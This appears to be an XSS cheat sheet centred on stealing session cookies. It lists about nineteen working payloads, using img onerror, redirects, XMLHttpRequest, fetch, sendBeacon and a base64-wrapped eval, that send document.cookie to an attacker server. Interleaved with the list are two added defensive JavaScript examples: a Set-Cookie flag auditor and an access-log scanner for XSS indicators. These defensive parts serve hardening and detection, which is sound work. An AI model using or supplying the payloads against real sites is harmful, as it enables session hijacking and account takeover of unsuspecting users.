XSS

Cross-site Scripting

Methodology


Reflected XSS


Stealing Cookies

Key condition -> the target cookie must not carry the HttpOnly flag (HttpOnly set to false); otherwise document.cookie cannot read it and none of the payloads below will see it.
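To make that condition concrete from the defender's side, the following is an added example (not part of the original cheat sheet) that parses Set-Cookie headers, lists which cookies would be visible to document.cookie, audits a session cookie for the missing flags, and builds a hardened header. The cookie names, values and header strings are constructed for illustration; the helper names are this example's own.

```javascript
// Added example, not from the original page: Set-Cookie flag audit.
// All cookie names/values below are constructed sample data.

// Parse one Set-Cookie header value into { name, value, attrs }.
// Attribute keys are lower-cased; flag attributes (HttpOnly, Secure) map to true.
function parseSetCookie(header) {
  const parts = header.split(";").map((p) => p.trim()).filter(Boolean);
  const [nameValue, ...attrs] = parts;
  const eq = nameValue.indexOf("=");
  const cookie = {
    name: eq === -1 ? nameValue : nameValue.slice(0, eq).trim(),
    value: eq === -1 ? "" : nameValue.slice(eq + 1).trim(),
    attrs: {},
  };
  for (const a of attrs) {
    const i = a.indexOf("=");
    const key = (i === -1 ? a : a.slice(0, i)).trim().toLowerCase();
    cookie.attrs[key] = i === -1 ? true : a.slice(i + 1).trim();
  }
  return cookie;
}

// Names of cookies that document.cookie would expose to injected script:
// exactly those set without HttpOnly (the "key condition" above).
function scriptVisibleCookies(setCookieHeaders) {
  return setCookieHeaders
    .map(parseSetCookie)
    .filter((c) => !c.attrs.httponly)
    .map((c) => c.name);
}

// Findings a reviewer would raise for a session cookie header.
function auditSessionCookie(header) {
  const c = parseSetCookie(header);
  const findings = [];
  if (!c.attrs.httponly) findings.push("missing HttpOnly: readable via document.cookie");
  if (!c.attrs.secure) findings.push("missing Secure: sent over plaintext HTTP");
  const samesite = typeof c.attrs.samesite === "string" ? c.attrs.samesite.toLowerCase() : "";
  if (samesite !== "lax" && samesite !== "strict") findings.push("SameSite not Lax/Strict");
  return findings;
}

// Build a Set-Cookie header that passes the audit above.
function hardenedSessionCookie(name, value, maxAgeSeconds) {
  return [
    `${name}=${encodeURIComponent(value)}`,
    `Max-Age=${maxAgeSeconds}`,
    "Path=/",
    "Secure",
    "HttpOnly",
    "SameSite=Lax",
  ].join("; ");
}

// Constructed sample headers: a weak session cookie, a hardened one, a UI preference.
const SAMPLE_HEADERS = [
  "PHPSESSID=abc123; Path=/",
  hardenedSessionCookie("sid", "x y", 3600),
  "theme=dark; Path=/; Secure",
];

console.log("visible to document.cookie:", scriptVisibleCookies(SAMPLE_HEADERS));
console.log("weak cookie findings:", auditSessionCookie(SAMPLE_HEADERS[0]));
```

Run it with `node` to see that only `PHPSESSID` and `theme` would be readable by script; the hardened `sid` cookie is not, which is the single change that defeats every payload in the list below.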

  • Use when injecting into an image tag where an error event triggers (HTTP response error or broken link):

<img src=x onerror=this.src="http://<YOUR_SERVER_IP>/?c="+document.cookie>
  • Use when you can inject an image and trigger a redirect via the onerror event (load error):

<img src=x onerror="location.href='http://<YOUR_SERVER_IP>/?c='+ document.cookie">
  • Use in situations where you can send cookies via an image request (URL encoding):

<script>new Image().src="http://<IP>/?c="+encodeURI(document.cookie);</script>
  • Use when you need to send cookies using an audio object:

<script>new Audio().src="http://<IP>/?c="+escape(document.cookie);</script>
  • Use when you want to redirect the user to a server with the cookies attached:

<script>location.href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
  • Similar to the previous one; use when you want to redirect:

<script>location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
  • Use in scenarios where you can modify the document.location and send cookies:

<script>document.location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
  • Inject when you need to send cookies via document.location.href and trigger a redirect:

<script>document.location.href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
  • Use to dynamically write an image that sends cookies:

<script>document.write('<img src="http://<YOUR_SERVER_IP>?c='+document.cookie+'" />')</script>
  • Use when you need to assign a location redirect with cookies:

<script>window.location.assign('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>
  • Similar to the previous one, use when you need to access window.location properties dynamically:

<script>window['location']['assign']('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>
  • Use when you need to modify window.location.href dynamically:

<script>window['location']['href']='http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
  • Use when you can dynamically join the URL and cookies to redirect:

<script>document.location=["http://<YOUR_SERVER_IP>?c",document.cookie].join()</script>
  • Use when you can send cookies using an image object:

<script>var i=new Image(); i.src="http://10.10.14.6/?c="+document.cookie;</script>
  • Use when you need to redirect with concatenation of cookies into a URL:

<script>window.location="https://<SERVER_IP>/?c=".concat(document.cookie)</script>
  • Use in scenarios where you can send cookies via an XMLHttpRequest:

<script>var xhttp=new XMLHttpRequest();xhttp.open("GET", "http://<SERVER_IP>/?c="%2Bdocument.cookie, true);xhttp.send();</script>
  • Use when you can inject base64-encoded JavaScript and execute it to send cookies:

<script>eval(atob('ZG9jdW1lbnQud3JpdGUoIjxpbWcgc3JjPSdodHRwczovLzxTRVJWRVJfSVA+P2M9IisgZG9jdW1lbnQuY29va2llICsiJyAvPiIp'));</script>
  • Use when you need to send cookies via fetch with no-cors mode to avoid response handling:

<script>fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net', {method: 'POST', mode: 'no-cors', body:document.cookie});</script>
  • Use when you want to send cookies asynchronously in the background using the sendBeacon API, typically for stealthier attacks:

<script>navigator.sendBeacon('https://ssrftest.com/x/AAAAA',document.cookie)</script>
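Every payload above, including the URL-encoded and base64-wrapped variants, has to arrive in the target site's request first, so that is where it can be detected. The following is an added example (not part of the original cheat sheet) of detection logic that scans access-log lines, percent-decodes the request target, expands atob('...') literals so base64-wrapped code is inspected too, and reports which indicators matched. The log lines, the host `attacker.invalid` and the indicator names are constructed for illustration.

```javascript
// Added example, not from the original page: request-side XSS indicators
// in web-server access logs. Sample lines below are constructed data.

// Indicator name -> pattern, evaluated against the decoded request target.
const INDICATORS = {
  script_tag: /<\s*script/i,
  event_handler: /\bon(?:error|load)\s*=/i,
  cookie_read: /document\s*\.\s*cookie/i,
  beacon_or_fetch: /\b(?:sendBeacon|fetch)\s*\(/i,
  image_or_audio_object: /new\s+(?:Image|Audio)\s*\(/i,
  base64_eval: /\batob\s*\(/i,
};

// Percent-decode repeatedly (double encoding is common); stop on bad input.
function fullyDecode(s) {
  let prev = null;
  let cur = s;
  for (let i = 0; i < 3 && cur !== prev; i++) {
    prev = cur;
    try {
      cur = decodeURIComponent(cur);
    } catch {
      break;
    }
  }
  return cur;
}

// Append the decoded form of each atob('<base64>') literal so the
// indicator patterns also see what the base64 hides.
function expandBase64Literals(s) {
  return s.replace(/atob\s*\(\s*['"]([A-Za-z0-9+/=]+)['"]\s*\)/g, (m, b64) => {
    const decoded = Buffer.from(b64, "base64").toString("utf8");
    return `${m} /*decoded:${decoded}*/`;
  });
}

// Pull the request target out of a combined-log-format line.
function requestTarget(line) {
  const m = line.match(/"(?:GET|POST|PUT|DELETE|HEAD|OPTIONS) (\S+) HTTP\/[\d.]+"/);
  return m ? m[1] : null;
}

// Return the list of indicator names that fire for one log line ([] if none).
function scanLogLine(line) {
  const target = requestTarget(line);
  if (!target) return [];
  const decoded = expandBase64Literals(fullyDecode(target));
  return Object.keys(INDICATORS).filter((k) => INDICATORS[k].test(decoded));
}

// Scan a whole log; return { index, indicators } for each suspicious line.
function scanLog(lines) {
  return lines
    .map((line, index) => ({ index, indicators: scanLogLine(line) }))
    .filter((r) => r.indicators.length > 0);
}

// Constructed sample log: a URL-encoded image-object payload, a base64-wrapped
// one, and a benign search for comparison.
const SAMPLE_LOG = [
  '10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET /search?q=%3Cscript%3Enew%20Image().src%3D%22http%3A%2F%2Fattacker.invalid%2F%3Fc%3D%22%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 512',
  '10.0.0.5 - - [01/Jan/2024:12:00:01 +0000] "GET /search?q=%3Cscript%3Eeval(atob(\'ZG9jdW1lbnQuY29va2ll\'))%3C/script%3E HTTP/1.1" 200 512',
  '10.0.0.9 - - [01/Jan/2024:12:00:02 +0000] "GET /search?q=cookie+recipes HTTP/1.1" 200 2048',
];

for (const hit of scanLog(SAMPLE_LOG)) {
  console.log(`line ${hit.index}: ${hit.indicators.join(", ")}`);
}
```

The decode step is what matters: the second sample line contains no literal `document.cookie`, and a scanner that only greps the raw line would miss it. Treat the indicator list as a starting point for alerting, not as a WAF; the real fix is the cookie hardening and output encoding on the application side.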
